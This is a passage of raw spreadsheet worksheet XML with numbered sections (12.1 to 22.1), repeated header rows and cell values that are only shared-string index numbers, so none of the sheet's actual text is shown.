      </c>
      <c r="D123" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E123" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F123" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G123" s="51" t="s">
        <v>497</v>
      </c>
      <c r="H123" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I123" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J123" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="124" spans="1:10" ht="237.5">
      <c r="A124" s="2">
        <v>12.1</v>
      </c>
      <c r="B124" s="10" t="s">
        <v>902</v>
      </c>
      <c r="C124" s="10" t="s">
        <v>903</v>
      </c>
      <c r="D124" s="10" t="s">
        <v>904</v>
      </c>
      <c r="E124" s="10" t="s">
        <v>905</v>
      </c>
      <c r="G124" s="10" t="s">
        <v>906</v>
      </c>
    </row>
    <row r="125" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D125" s="32"/>
      <c r="E125" s="32"/>
      <c r="F125" s="32"/>
      <c r="G125" s="32"/>
    </row>
    <row r="126" spans="1:10" ht="32.15" customHeight="1">
      <c r="A126" s="17" t="s">
        <v>907</v>
      </c>
      <c r="B126" s="17" t="s">
        <v>111</v>
      </c>
      <c r="C126" s="17"/>
      <c r="D126" s="10"/>
      <c r="F126" s="10"/>
    </row>
    <row r="127" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A127" s="46"/>
      <c r="B127" s="46"/>
      <c r="C127" s="46"/>
      <c r="D127" s="29"/>
      <c r="E127" s="29"/>
      <c r="F127" s="29"/>
      <c r="G127" s="29"/>
    </row>
    <row r="128" spans="1:10" s="26" customFormat="1">
      <c r="A128" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B128" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C128" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D128" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E128" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F128" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G128" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H128" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I128" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J128" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="129" spans="1:10" ht="101">
      <c r="A129" s="2">
        <v>13.1</v>
      </c>
      <c r="B129" s="10" t="s">
        <v>908</v>
      </c>
      <c r="C129" s="10" t="s">
        <v>909</v>
      </c>
      <c r="D129" s="10" t="s">
        <v>762</v>
      </c>
      <c r="G129" s="53" t="s">
        <v>910</v>
      </c>
    </row>
    <row r="130" spans="1:10" ht="163.5">
      <c r="D130" s="29" t="s">
        <v>911</v>
      </c>
      <c r="E130" s="10" t="s">
        <v>912</v>
      </c>
      <c r="G130" s="53" t="s">
        <v>913</v>
      </c>
    </row>
    <row r="131" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D131" s="32"/>
      <c r="E131" s="32"/>
      <c r="F131" s="32"/>
      <c r="G131" s="32"/>
    </row>
    <row r="132" spans="1:10" ht="32.15" customHeight="1">
      <c r="A132" s="17" t="s">
        <v>914</v>
      </c>
      <c r="B132" s="17" t="s">
        <v>63</v>
      </c>
      <c r="C132" s="17"/>
      <c r="D132" s="10"/>
      <c r="F132" s="10"/>
    </row>
    <row r="133" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A133" s="46"/>
      <c r="B133" s="46"/>
      <c r="C133" s="46"/>
      <c r="D133" s="29"/>
      <c r="E133" s="29"/>
      <c r="F133" s="29"/>
      <c r="G133" s="29"/>
    </row>
    <row r="134" spans="1:10" s="26" customFormat="1">
      <c r="A134" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B134" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C134" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D134" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E134" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F134" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G134" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H134" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I134" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J134" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="135" spans="1:10" ht="113.4" customHeight="1">
      <c r="A135" s="2">
        <v>14.1</v>
      </c>
      <c r="B135" s="10" t="s">
        <v>915</v>
      </c>
      <c r="C135" s="21" t="s">
        <v>916</v>
      </c>
      <c r="D135" s="10" t="s">
        <v>917</v>
      </c>
      <c r="F135" s="10"/>
      <c r="G135" s="54" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="136" spans="1:10" ht="126">
      <c r="C136" s="10" t="s">
        <v>919</v>
      </c>
      <c r="D136" s="10" t="s">
        <v>920</v>
      </c>
      <c r="E136" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F136" s="10"/>
      <c r="G136" s="54" t="s">
        <v>922</v>
      </c>
    </row>
    <row r="137" spans="1:10" ht="125">
      <c r="C137" s="2" t="s">
        <v>923</v>
      </c>
      <c r="D137" s="10" t="s">
        <v>924</v>
      </c>
      <c r="E137" s="10" t="s">
        <v>925</v>
      </c>
      <c r="F137" s="10"/>
      <c r="G137" s="54" t="s">
        <v>926</v>
      </c>
    </row>
    <row r="138" spans="1:10" ht="75">
      <c r="C138" s="10" t="s">
        <v>927</v>
      </c>
      <c r="D138" s="10" t="s">
        <v>928</v>
      </c>
      <c r="E138" s="10" t="s">
        <v>929</v>
      </c>
      <c r="F138" s="10"/>
      <c r="G138" s="54" t="s">
        <v>930</v>
      </c>
    </row>
    <row r="139" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D139" s="32"/>
      <c r="E139" s="32"/>
      <c r="F139" s="32"/>
      <c r="G139" s="32"/>
    </row>
    <row r="140" spans="1:10" ht="113.4" customHeight="1">
      <c r="A140" s="24">
        <v>14.2</v>
      </c>
      <c r="B140" s="10" t="s">
        <v>931</v>
      </c>
      <c r="C140" s="21" t="s">
        <v>932</v>
      </c>
      <c r="D140" s="10" t="s">
        <v>917</v>
      </c>
      <c r="F140" s="10"/>
      <c r="G140" s="54" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="141" spans="1:10" ht="139">
      <c r="C141" s="10" t="s">
        <v>919</v>
      </c>
      <c r="D141" s="10" t="s">
        <v>933</v>
      </c>
      <c r="E141" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F141" s="10"/>
      <c r="G141" s="54" t="s">
        <v>934</v>
      </c>
    </row>
    <row r="142" spans="1:10" ht="125">
      <c r="C142" s="2" t="s">
        <v>923</v>
      </c>
      <c r="D142" s="10" t="s">
        <v>935</v>
      </c>
      <c r="E142" s="10" t="s">
        <v>925</v>
      </c>
      <c r="F142" s="10"/>
      <c r="G142" s="54" t="s">
        <v>926</v>
      </c>
    </row>
    <row r="143" spans="1:10" ht="75">
      <c r="C143" s="10" t="s">
        <v>927</v>
      </c>
      <c r="D143" s="10" t="s">
        <v>928</v>
      </c>
      <c r="E143" s="10" t="s">
        <v>929</v>
      </c>
      <c r="F143" s="10"/>
      <c r="G143" s="54" t="s">
        <v>930</v>
      </c>
    </row>
    <row r="144" spans="1:10" s="27" customFormat="1">
      <c r="D144" s="32"/>
      <c r="E144" s="32"/>
      <c r="F144" s="32"/>
      <c r="G144" s="32"/>
    </row>
    <row r="145" spans="1:7" ht="35" customHeight="1">
      <c r="A145" s="2">
        <v>14.3</v>
      </c>
      <c r="B145" s="2" t="s">
        <v>936</v>
      </c>
      <c r="C145" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D145" s="10" t="s">
        <v>575</v>
      </c>
      <c r="F145" s="10"/>
    </row>
    <row r="146" spans="1:7" ht="212.5">
      <c r="D146" s="10" t="s">
        <v>581</v>
      </c>
      <c r="E146" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F146" s="10"/>
      <c r="G146" s="54" t="s">
        <v>937</v>
      </c>
    </row>
    <row r="147" spans="1:7" ht="125">
      <c r="D147" s="10" t="s">
        <v>938</v>
      </c>
      <c r="E147" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F147" s="10"/>
      <c r="G147" s="54" t="s">
        <v>940</v>
      </c>
    </row>
    <row r="148" spans="1:7" s="27" customFormat="1">
      <c r="D148" s="32"/>
      <c r="E148" s="32"/>
      <c r="F148" s="32"/>
      <c r="G148" s="32"/>
    </row>
    <row r="149" spans="1:7" ht="102.25" customHeight="1">
      <c r="A149" s="2">
        <v>14.4</v>
      </c>
      <c r="B149" s="2" t="s">
        <v>941</v>
      </c>
      <c r="C149" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D149" s="10" t="s">
        <v>942</v>
      </c>
      <c r="F149" s="10"/>
    </row>
    <row r="150" spans="1:7" ht="250">
      <c r="D150" s="10" t="s">
        <v>943</v>
      </c>
      <c r="E150" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F150" s="10"/>
    </row>
    <row r="151" spans="1:7" ht="137.5">
      <c r="D151" s="10" t="s">
        <v>944</v>
      </c>
      <c r="E151" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F151" s="10"/>
    </row>
    <row r="152" spans="1:7" s="27" customFormat="1">
      <c r="D152" s="32"/>
      <c r="E152" s="32"/>
      <c r="F152" s="32"/>
      <c r="G152" s="32"/>
    </row>
    <row r="153" spans="1:7" ht="102.25" customHeight="1">
      <c r="A153" s="2">
        <v>14.5</v>
      </c>
      <c r="B153" s="2" t="s">
        <v>945</v>
      </c>
      <c r="C153" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D153" s="10" t="s">
        <v>946</v>
      </c>
      <c r="F153" s="10"/>
    </row>
    <row r="154" spans="1:7" ht="187.5">
      <c r="D154" s="10" t="s">
        <v>947</v>
      </c>
      <c r="E154" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F154" s="10"/>
    </row>
    <row r="155" spans="1:7" ht="137.5">
      <c r="D155" s="10" t="s">
        <v>944</v>
      </c>
      <c r="E155" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F155" s="10"/>
    </row>
    <row r="156" spans="1:7" s="27" customFormat="1">
      <c r="D156" s="32"/>
      <c r="E156" s="32"/>
      <c r="F156" s="32"/>
      <c r="G156" s="32"/>
    </row>
    <row r="157" spans="1:7" ht="102.25" customHeight="1">
      <c r="A157" s="2">
        <v>14.6</v>
      </c>
      <c r="B157" s="2" t="s">
        <v>948</v>
      </c>
      <c r="C157" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D157" s="10" t="s">
        <v>949</v>
      </c>
      <c r="F157" s="10"/>
    </row>
    <row r="158" spans="1:7" ht="175">
      <c r="D158" s="10" t="s">
        <v>950</v>
      </c>
      <c r="E158" s="10" t="s">
        <v>921</v>
      </c>
      <c r="F158" s="10"/>
    </row>
    <row r="159" spans="1:7" ht="137.5">
      <c r="D159" s="10" t="s">
        <v>944</v>
      </c>
      <c r="E159" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F159" s="10"/>
    </row>
    <row r="160" spans="1:7" s="27" customFormat="1">
      <c r="D160" s="32"/>
      <c r="E160" s="32"/>
      <c r="F160" s="32"/>
      <c r="G160" s="32"/>
    </row>
    <row r="161" spans="1:10" ht="35" customHeight="1">
      <c r="A161" s="2">
        <v>14.7</v>
      </c>
      <c r="B161" s="2" t="s">
        <v>951</v>
      </c>
      <c r="C161" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D161" s="10" t="s">
        <v>575</v>
      </c>
      <c r="F161" s="10"/>
    </row>
    <row r="162" spans="1:10" ht="212.5">
      <c r="D162" s="10" t="s">
        <v>581</v>
      </c>
      <c r="F162" s="10"/>
    </row>
    <row r="163" spans="1:10" ht="125">
      <c r="D163" s="10" t="s">
        <v>952</v>
      </c>
      <c r="E163" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F163" s="10"/>
    </row>
    <row r="164" spans="1:10" ht="300">
      <c r="D164" s="10" t="s">
        <v>953</v>
      </c>
      <c r="E164" s="10" t="s">
        <v>939</v>
      </c>
      <c r="F164" s="10"/>
    </row>
    <row r="165" spans="1:10">
      <c r="C165" s="10"/>
      <c r="D165" s="10"/>
      <c r="F165" s="10"/>
    </row>
    <row r="166" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D166" s="32"/>
      <c r="E166" s="32"/>
      <c r="F166" s="32"/>
      <c r="G166" s="32"/>
    </row>
    <row r="167" spans="1:10" ht="32.15" customHeight="1">
      <c r="A167" s="17" t="s">
        <v>954</v>
      </c>
      <c r="B167" s="17" t="s">
        <v>73</v>
      </c>
      <c r="C167" s="17"/>
      <c r="D167" s="10"/>
      <c r="F167" s="10"/>
    </row>
    <row r="168" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A168" s="46"/>
      <c r="B168" s="46"/>
      <c r="C168" s="46"/>
      <c r="D168" s="29"/>
      <c r="E168" s="29"/>
      <c r="F168" s="29"/>
      <c r="G168" s="29"/>
    </row>
    <row r="169" spans="1:10" s="26" customFormat="1">
      <c r="A169" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B169" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C169" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D169" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E169" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F169" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G169" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H169" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I169" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J169" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="170" spans="1:10" ht="100">
      <c r="A170" s="2">
        <v>15.1</v>
      </c>
      <c r="B170" s="10" t="s">
        <v>955</v>
      </c>
      <c r="C170" s="10" t="s">
        <v>956</v>
      </c>
      <c r="D170" s="10" t="s">
        <v>957</v>
      </c>
    </row>
    <row r="171" spans="1:10" ht="200">
      <c r="D171" s="29" t="s">
        <v>958</v>
      </c>
      <c r="E171" s="10" t="s">
        <v>959</v>
      </c>
    </row>
    <row r="172" spans="1:10" ht="47.15" customHeight="1"/>
    <row r="173" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D173" s="32"/>
      <c r="E173" s="32"/>
      <c r="F173" s="32"/>
      <c r="G173" s="32"/>
    </row>
    <row r="174" spans="1:10" ht="32.15" customHeight="1">
      <c r="A174" s="17" t="s">
        <v>960</v>
      </c>
      <c r="B174" s="17" t="s">
        <v>117</v>
      </c>
      <c r="C174" s="17"/>
      <c r="D174" s="10"/>
      <c r="F174" s="10"/>
    </row>
    <row r="175" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A175" s="46"/>
      <c r="B175" s="46"/>
      <c r="C175" s="46"/>
      <c r="D175" s="29"/>
      <c r="E175" s="29"/>
      <c r="F175" s="29"/>
      <c r="G175" s="29"/>
    </row>
    <row r="176" spans="1:10" s="26" customFormat="1">
      <c r="A176" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B176" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C176" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D176" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E176" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F176" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G176" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H176" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I176" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J176" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="177" spans="1:10" ht="175">
      <c r="A177" s="2">
        <v>16.100000000000001</v>
      </c>
      <c r="B177" s="10" t="s">
        <v>117</v>
      </c>
      <c r="C177" s="21" t="s">
        <v>961</v>
      </c>
      <c r="D177" s="10" t="s">
        <v>962</v>
      </c>
      <c r="E177" s="10" t="s">
        <v>963</v>
      </c>
      <c r="F177" s="10"/>
    </row>
    <row r="178" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D178" s="32"/>
      <c r="E178" s="32"/>
      <c r="F178" s="32"/>
      <c r="G178" s="32"/>
    </row>
    <row r="179" spans="1:10" ht="32.15" customHeight="1">
      <c r="A179" s="17" t="s">
        <v>964</v>
      </c>
      <c r="B179" s="17" t="s">
        <v>120</v>
      </c>
      <c r="C179" s="17"/>
      <c r="D179" s="10"/>
      <c r="F179" s="10"/>
    </row>
    <row r="180" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A180" s="46"/>
      <c r="B180" s="46"/>
      <c r="C180" s="46"/>
      <c r="D180" s="29"/>
      <c r="E180" s="29"/>
      <c r="F180" s="29"/>
      <c r="G180" s="29"/>
    </row>
    <row r="181" spans="1:10" s="26" customFormat="1">
      <c r="A181" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B181" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C181" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D181" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E181" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F181" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G181" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H181" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I181" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J181" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="182" spans="1:10" ht="175">
      <c r="A182" s="2">
        <v>17.100000000000001</v>
      </c>
      <c r="B182" s="10" t="s">
        <v>120</v>
      </c>
      <c r="C182" s="21" t="s">
        <v>965</v>
      </c>
      <c r="D182" s="10" t="s">
        <v>966</v>
      </c>
      <c r="E182" s="10" t="s">
        <v>967</v>
      </c>
      <c r="F182" s="10"/>
    </row>
    <row r="183" spans="1:10" s="27" customFormat="1" ht="9" customHeight="1">
      <c r="E183" s="32"/>
      <c r="G183" s="32"/>
    </row>
    <row r="184" spans="1:10" ht="175">
      <c r="A184" s="2">
        <v>17.2</v>
      </c>
      <c r="B184" s="2" t="s">
        <v>120</v>
      </c>
      <c r="C184" s="21" t="s">
        <v>968</v>
      </c>
      <c r="D184" s="10" t="s">
        <v>969</v>
      </c>
      <c r="E184" s="10" t="s">
        <v>970</v>
      </c>
    </row>
    <row r="185" spans="1:10" s="27" customFormat="1" ht="9" customHeight="1">
      <c r="E185" s="32"/>
      <c r="G185" s="32"/>
    </row>
    <row r="186" spans="1:10" ht="32.15" customHeight="1">
      <c r="A186" s="17" t="s">
        <v>971</v>
      </c>
      <c r="B186" s="17" t="s">
        <v>124</v>
      </c>
      <c r="C186" s="17"/>
      <c r="D186" s="10"/>
      <c r="F186" s="10"/>
    </row>
    <row r="187" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A187" s="46"/>
      <c r="B187" s="46"/>
      <c r="C187" s="46"/>
      <c r="D187" s="29"/>
      <c r="E187" s="29"/>
      <c r="F187" s="29"/>
      <c r="G187" s="29"/>
    </row>
    <row r="188" spans="1:10" s="26" customFormat="1">
      <c r="A188" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B188" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C188" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D188" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E188" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F188" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G188" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H188" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I188" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J188" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="189" spans="1:10" ht="125">
      <c r="A189" s="2">
        <v>18.100000000000001</v>
      </c>
      <c r="B189" s="2" t="s">
        <v>972</v>
      </c>
      <c r="C189" s="2" t="s">
        <v>973</v>
      </c>
      <c r="D189" s="10" t="s">
        <v>974</v>
      </c>
      <c r="E189" s="10" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="190" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D190" s="32"/>
      <c r="E190" s="32"/>
      <c r="F190" s="32"/>
      <c r="G190" s="32"/>
    </row>
    <row r="191" spans="1:10" ht="150">
      <c r="A191" s="2">
        <v>18.2</v>
      </c>
      <c r="B191" s="10" t="s">
        <v>976</v>
      </c>
      <c r="C191" s="10" t="s">
        <v>977</v>
      </c>
      <c r="D191" s="10" t="s">
        <v>978</v>
      </c>
      <c r="E191" s="10" t="s">
        <v>979</v>
      </c>
    </row>
    <row r="192" spans="1:10" s="27" customFormat="1" ht="8.15" customHeight="1">
      <c r="D192" s="32"/>
      <c r="E192" s="32"/>
      <c r="F192" s="32"/>
      <c r="G192" s="32"/>
    </row>
    <row r="193" spans="1:10" ht="32.15" customHeight="1">
      <c r="A193" s="17" t="s">
        <v>980</v>
      </c>
      <c r="B193" s="17" t="s">
        <v>128</v>
      </c>
      <c r="C193" s="17"/>
      <c r="D193" s="10"/>
      <c r="F193" s="10"/>
    </row>
    <row r="194" spans="1:10" s="28" customFormat="1" ht="15" customHeight="1">
      <c r="A194" s="46"/>
      <c r="B194" s="46"/>
      <c r="C194" s="46"/>
      <c r="D194" s="29"/>
      <c r="E194" s="29"/>
      <c r="F194" s="29"/>
      <c r="G194" s="29"/>
    </row>
    <row r="195" spans="1:10" s="26" customFormat="1">
      <c r="A195" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B195" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C195" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D195" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E195" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F195" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G195" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H195" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I195" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J195" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="196" spans="1:10" ht="125">
      <c r="A196" s="2">
        <v>19.100000000000001</v>
      </c>
      <c r="B196" s="2" t="s">
        <v>128</v>
      </c>
      <c r="C196" s="10" t="s">
        <v>981</v>
      </c>
      <c r="D196" s="10" t="s">
        <v>982</v>
      </c>
      <c r="E196" s="10" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="197" spans="1:10" ht="36.75" customHeight="1">
      <c r="A197" s="17" t="s">
        <v>133</v>
      </c>
      <c r="B197" s="17" t="s">
        <v>616</v>
      </c>
      <c r="C197" s="17"/>
    </row>
    <row r="198" spans="1:10" s="26" customFormat="1">
      <c r="A198" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B198" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C198" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D198" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E198" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F198" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G198" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H198" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I198" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J198" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="199" spans="1:10" ht="187.5">
      <c r="A199" s="2">
        <v>20.100000000000001</v>
      </c>
      <c r="B199" s="2" t="s">
        <v>984</v>
      </c>
      <c r="C199" s="2" t="s">
        <v>985</v>
      </c>
      <c r="D199" s="10" t="s">
        <v>986</v>
      </c>
      <c r="E199" s="10" t="s">
        <v>987</v>
      </c>
    </row>
    <row r="200" spans="1:10" ht="125">
      <c r="A200" s="2">
        <v>20.2</v>
      </c>
      <c r="B200" s="2" t="s">
        <v>988</v>
      </c>
      <c r="C200" s="2" t="s">
        <v>989</v>
      </c>
      <c r="D200" s="10" t="s">
        <v>990</v>
      </c>
      <c r="E200" s="10" t="s">
        <v>991</v>
      </c>
    </row>
    <row r="201" spans="1:10" ht="26">
      <c r="A201" s="17" t="s">
        <v>135</v>
      </c>
      <c r="B201" s="17" t="s">
        <v>992</v>
      </c>
      <c r="C201" s="17"/>
    </row>
    <row r="203" spans="1:10" s="26" customFormat="1">
      <c r="A203" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B203" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C203" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D203" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E203" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F203" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G203" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H203" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I203" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J203" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="204" spans="1:10" ht="87.5">
      <c r="A204" s="2">
        <v>21.1</v>
      </c>
      <c r="B204" s="2" t="s">
        <v>993</v>
      </c>
      <c r="C204" s="2" t="s">
        <v>994</v>
      </c>
      <c r="D204" s="10" t="s">
        <v>995</v>
      </c>
      <c r="E204" s="10" t="s">
        <v>996</v>
      </c>
    </row>
    <row r="205" spans="1:10" s="27" customFormat="1">
      <c r="E205" s="32"/>
      <c r="G205" s="32"/>
    </row>
    <row r="206" spans="1:10" ht="87.5">
      <c r="A206" s="2">
        <v>21.2</v>
      </c>
      <c r="B206" s="2" t="s">
        <v>997</v>
      </c>
      <c r="C206" s="2" t="s">
        <v>998</v>
      </c>
      <c r="D206" s="10" t="s">
        <v>999</v>
      </c>
      <c r="E206" s="10" t="s">
        <v>1000</v>
      </c>
    </row>
    <row r="207" spans="1:10" s="27" customFormat="1">
      <c r="E207" s="32"/>
      <c r="G207" s="32"/>
    </row>
    <row r="208" spans="1:10" ht="87.5">
      <c r="A208" s="2">
        <v>21.3</v>
      </c>
      <c r="B208" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="C208" s="2" t="s">
        <v>1002</v>
      </c>
      <c r="D208" s="10" t="s">
        <v>1003</v>
      </c>
      <c r="E208" s="10" t="s">
        <v>1000</v>
      </c>
    </row>
    <row r="209" spans="1:10" s="27" customFormat="1">
      <c r="E209" s="32"/>
      <c r="G209" s="32"/>
    </row>
    <row r="210" spans="1:10" ht="87.5">
      <c r="A210" s="2">
        <v>21.4</v>
      </c>
      <c r="B210" s="2" t="s">
        <v>1004</v>
      </c>
      <c r="C210" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="D210" s="10" t="s">
        <v>1006</v>
      </c>
      <c r="E210" s="10" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="211" spans="1:10" s="30" customFormat="1">
      <c r="A211" s="27"/>
      <c r="B211" s="27"/>
      <c r="C211" s="27"/>
      <c r="D211" s="32"/>
      <c r="E211" s="32"/>
      <c r="G211" s="32"/>
    </row>
    <row r="212" spans="1:10" ht="287.5">
      <c r="A212" s="2">
        <v>21.5</v>
      </c>
      <c r="B212" s="2" t="s">
        <v>671</v>
      </c>
      <c r="C212" s="10" t="s">
        <v>1008</v>
      </c>
      <c r="D212" s="10" t="s">
        <v>1009</v>
      </c>
      <c r="E212" s="10" t="s">
        <v>675</v>
      </c>
    </row>
    <row r="213" spans="1:10" s="27" customFormat="1">
      <c r="E213" s="32"/>
      <c r="G213" s="32"/>
    </row>
    <row r="214" spans="1:10" ht="26">
      <c r="A214" s="17" t="s">
        <v>137</v>
      </c>
      <c r="B214" s="17" t="s">
        <v>1010</v>
      </c>
      <c r="C214" s="17"/>
    </row>
    <row r="216" spans="1:10" s="26" customFormat="1">
      <c r="A216" s="26" t="s">
        <v>43</v>
      </c>
      <c r="B216" s="26" t="s">
        <v>492</v>
      </c>
      <c r="C216" s="26" t="s">
        <v>493</v>
      </c>
      <c r="D216" s="26" t="s">
        <v>494</v>
      </c>
      <c r="E216" s="55" t="s">
        <v>495</v>
      </c>
      <c r="F216" s="26" t="s">
        <v>496</v>
      </c>
      <c r="G216" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H216" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I216" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J216" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="217" spans="1:10" ht="112.5">
      <c r="A217" s="2">
        <v>22.1</v>
      </c>
      <c r="B217" s="2" t="s">
        <v>1011</v>
      </c>
      <c r="C217" s="2" t="s">
        <v>1012</v>
      </c>
      <c r="D217" s="10" t="s">
        <v>1013</v>
      </c>
      <c r="E217" s="10" t="s">
        <v>1014</v>
      </c>
      <c r="G217" s="10" t="s">
        <v>1015</v>
      </c>
      <c r="H217" s="2" t="s">
        <v>481</v>
      </c>
      <c r="I217" s="10" t="s">
        <v>1016</v>
      </c>
    </row>
    <row r="218" spans="1:10" s="27" customFormat="1">
      <c r="E218" s="32"/>
      <c r="G218" s="32"/>
    </row>
    <row r="219" spans="1:10" ht="26">
      <c r="A219" s="17" t="s">
        <v>139</v>
      </c>
      <c r="B219" s="17" t="s">
        <v>648</v>
      </c>
      <c r="C219" s="17"/>
      <c r="G219" s="8"/>
      <c r="H219"/>
      <c r="I219"/>
    </row>
    <row r="221" spans="1:10" s="26" customFormat="1">
      <c r="A221" s="26" t="s">
        <v>43</v>
      </c>
      <c r="B221" s="26" t="s">
        <v>492</v>
      </c>
      <c r="C221" s="26" t="s">
